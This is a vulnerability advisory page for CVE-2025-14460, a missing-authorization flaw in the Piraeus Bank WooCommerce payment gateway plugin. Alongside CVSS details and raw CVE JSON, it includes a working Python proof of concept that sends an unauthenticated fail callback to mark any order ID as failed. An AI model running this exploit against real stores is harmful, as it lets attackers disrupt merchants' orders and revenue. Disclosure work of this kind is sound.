Security Vulnerability Report
中文
CVE-2025-14460 CVSS 5.3 MEDIUM

CVE-2025-14460

Published: 2026-01-07 12:16:55
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Piraeus Bank WooCommerce Payment Gateway plugin for WordPress is vulnerable to unauthorized order status modification in all versions up to, and including, 3.1.4. This is due to missing authorization checks on the payment callback endpoint handler when processing the 'fail' callback from the payment gateway. This makes it possible for unauthenticated attackers to change any order's status to 'failed' via the publicly accessible WooCommerce API endpoint by providing only the order ID (MerchantReference parameter), which can be easily enumerated as order IDs are sequential integers. This can cause significant business disruption including canceled shipments, inventory issues, and loss of revenue.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Piraeus Bank WooCommerce Payment Gateway <= 3.1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-14460 PoC # Unauthenticated Order Status Modification in Piraeus Bank WooCommerce Payment Gateway TARGET_URL = "http://vulnerable-site.com/" # Replace with target URL API_ENDPOINT = "?wc-api=wc_piraeusbank_gateway" def exploit(order_id): """ Modify order status to 'failed' without authentication """ # Construct the callback URL with fail status and target order ID url = f"{TARGET_URL}{API_ENDPOINT}" # Prepare the malicious callback request data = { 'MerchantReference': str(order_id), # Sequential order ID 'StatusId': 'fail', # Trigger fail callback 'ErrorCode': '0', 'ErrorMessage': 'Payment Failed' } # Send unauthenticated request response = requests.post(url, data=data, timeout=10) return response.status_code, response.text if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <order_id>") print("Example: python exploit.py 1234") sys.exit(1) order_id = sys.argv[1] print(f"[*] Targeting order ID: {order_id}") status, resp = exploit(order_id) print(f"[*] Response Status: {status}") if status == 200: print("[+] Order status modified to 'failed'") else: print("[-] Exploitation failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14460", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:54.903", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Piraeus Bank WooCommerce Payment Gateway plugin for WordPress is vulnerable to unauthorized order status modification in all versions up to, and including, 3.1.4. This is due to missing authorization checks on the payment callback endpoint handler when processing the 'fail' callback from the payment gateway. This makes it possible for unauthenticated attackers to change any order's status to 'failed' via the publicly accessible WooCommerce API endpoint by providing only the order ID (MerchantReference parameter), which can be easily enumerated as order IDs are sequential integers. This can cause significant business disruption including canceled shipments, inventory issues, and loss of revenue."}, {"lang": "es", "value": "El plugin de pasarela de pago WooCommerce de Piraeus Bank para WordPress es vulnerable a la modificación no autorizada del estado de los pedidos en todas las versiones hasta la 3.1.4, inclusive. Esto se debe a la falta de comprobaciones de autorización en el manejador del endpoint de devolución de llamada de pago al procesar la devolución de llamada 'fail' de la pasarela de pago. Esto hace posible que atacantes no autenticados cambien el estado de cualquier pedido a 'failed' a través del endpoint de la API de WooCommerce de acceso público, proporcionando solo el ID del pedido (parámetro MerchantReference), que puede ser fácilmente enumerado ya que los IDs de los pedidos son enteros secuenciales. Esto puede causar una interrupción significativa del negocio, incluyendo envíos cancelados, problemas de inventario y pérdida de ingresos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/woo-payment-gateway-for-piraeus-bank/tags/3.1.4/classes/WC_Piraeusbank_Gateway.php#L821", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/woo-payment-gateway-for-piraeus-bank/trunk/classes/WC_Piraeusbank_Gateway.php#L821", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3439515/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d7b15198-8f44-4390-862b-35d41eb8a854?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.